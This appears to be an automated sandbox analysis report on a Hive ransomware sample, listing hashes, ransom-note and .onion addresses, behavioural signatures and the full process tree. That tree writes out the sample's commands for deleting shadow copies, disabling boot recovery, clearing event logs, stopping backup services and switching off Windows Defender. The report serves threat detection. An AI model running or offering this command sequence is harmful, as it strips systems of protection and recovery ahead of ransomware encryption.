Analysis
max time kernel: 148s
max time network: 121s
platform: windows10_x64
resource: win10-en-20211014
submitted: 24-11-2021 14:30

Static task: static1
Behavioral task: behavioral1
Sample: serenb.exe
Resource: win7-en-20211104

General
Target: serenb.exe
Size: 3.4MB
MD5: 177417be748814f6168171a42545f9dd
SHA1: 9c8b988e66e0fe6f9dab69b1055e4ee200531094
SHA256: 47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
SHA512: c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2

Malware Config
Extracted
C:\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
pid   Process
612   MpCmdRun.exe
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
pid   Process
3456  bcdedit.exe
2364  bcdedit.exe
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
File renamed: C:\Users\Admin\Pictures\EnterGrant.png => C:\Users\Admin\Pictures\EnterGrant.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__Fozhdthbo300.snwkz (serenb.exe)
File opened for modification: C:\Users\Admin\Pictures\EnterGrant.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__Fozhdthbo300.snwkz (serenb.exe)
File renamed: C:\Users\Admin\Pictures\CompleteLimit.tiff => C:\Users\Admin\Pictures\CompleteLimit.tiff.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__zZWpXAGRo9I0.snwkz (serenb.exe)
File opened for modification: C:\Users\Admin\Pictures\CompleteLimit.tiff.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__zZWpXAGRo9I0.snwkz (serenb.exe)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid   Process
1392  vssadmin.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
pid   Process
4016  powershell.exe
4016  powershell.exe
4016  powershell.exe
1136  powershell.exe
1136  powershell.exe
1136  powershell.exe
2292  serenb.exe
2292  serenb.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
C:\Users\Admin\AppData\Local\Temp\serenb.exe (PID 2292): "C:\Users\Admin\AppData\Local\Temp\serenb.exe"
  - Modifies extensions of user files
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\net.exe (PID 872): net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1176): C:\Windows\system32\net1 stop "SamSs" /y
  C:\Windows\SYSTEM32\net.exe (PID 1524): net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1428): C:\Windows\system32\net1 stop "SDRSVC" /y
  C:\Windows\SYSTEM32\net.exe (PID 1716): net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 296): C:\Windows\system32\net1 stop "SstpSvc" /y
  C:\Windows\SYSTEM32\net.exe (PID 3588): net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 420): C:\Windows\system32\net1 stop "UI0Detect" /y
  C:\Windows\SYSTEM32\net.exe (PID 440): net.exe stop "vmicvss" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 3172): C:\Windows\system32\net1 stop "vmicvss" /y
  C:\Windows\SYSTEM32\net.exe (PID 2236): net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1836): C:\Windows\system32\net1 stop "VSS" /y
  C:\Windows\SYSTEM32\net.exe (PID 1040): net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 2648): C:\Windows\system32\net1 stop "wbengine" /y
  C:\Windows\SYSTEM32\net.exe (PID 2088): net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 608): C:\Windows\system32\net1 stop "WebClient" /y
  C:\Windows\SYSTEM32\net.exe (PID 1156): net.exe stop "UnistoreSvc_136d4" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 372): C:\Windows\system32\net1 stop "UnistoreSvc_136d4" /y
  C:\Windows\SYSTEM32\sc.exe (PID 3936): sc.exe config "SamSs" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 436): sc.exe config "SDRSVC" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 912): sc.exe config "SstpSvc" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 1488): sc.exe config "UI0Detect" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 2336): sc.exe config "vmicvss" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 1544): sc.exe config "VSS" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 1736): sc.exe config "wbengine" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 3644): sc.exe config "WebClient" start= disabled
  C:\Windows\SYSTEM32\sc.exe (PID 3156): sc.exe config "UnistoreSvc_136d4" start= disabled
  C:\Windows\SYSTEM32\reg.exe (PID 768): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3984): reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2820): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3376): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1856): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1584): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2412): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2864): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3840): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2700): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1292): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1592): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe (PID 8): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1468): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3780): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3172): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\schtasks.exe (PID 3872): schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  C:\Windows\SYSTEM32\schtasks.exe (PID 3040): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  C:\Windows\SYSTEM32\schtasks.exe (PID 3320): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  C:\Windows\SYSTEM32\schtasks.exe (PID 696): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  C:\Windows\SYSTEM32\schtasks.exe (PID 896): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  C:\Windows\SYSTEM32\reg.exe (PID 712): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3956): reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe (PID 804): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  C:\Windows\SYSTEM32\reg.exe (PID 1216): reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2296): reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3652): reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3628): reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2288): reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 2008): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3100): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 3776): reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe (PID 520): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\vssadmin.exe (PID 1392): vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\wevtutil.exe (PID 1852): wevtutil.exe cl system
  C:\Windows\SYSTEM32\wevtutil.exe (PID 920): wevtutil.exe cl security
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SYSTEM32\wevtutil.exe (PID 1496): wevtutil.exe cl application
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe (PID 3788): wmic.exe SHADOWCOPY /nointeractive
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe (PID 1132): wmic.exe shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SYSTEM32\bcdedit.exe (PID 3456): bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
  C:\Windows\SYSTEM32\bcdedit.exe (PID 2364): bcdedit.exe /set {default} recoveryenabled no
    - Modifies boot configuration data using bcdedit
  C:\Windows\SYSTEM32\cmd.exe (PID 2452): cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    C:\Program Files\Windows Defender\MpCmdRun.exe (PID 612): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      - Deletes Windows Defender Definitions
  C:\Windows\SYSTEM32\cmd.exe (PID 1220): cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4016): powershell Set-MpPreference -DisableIOAVProtection $true
      - Suspicious behavior: EnumeratesProcesses
  C:\Windows\SYSTEM32\cmd.exe (PID 2332): cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1136): powershell Set-MpPreference -DisableRealtimeMonitoring $true
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads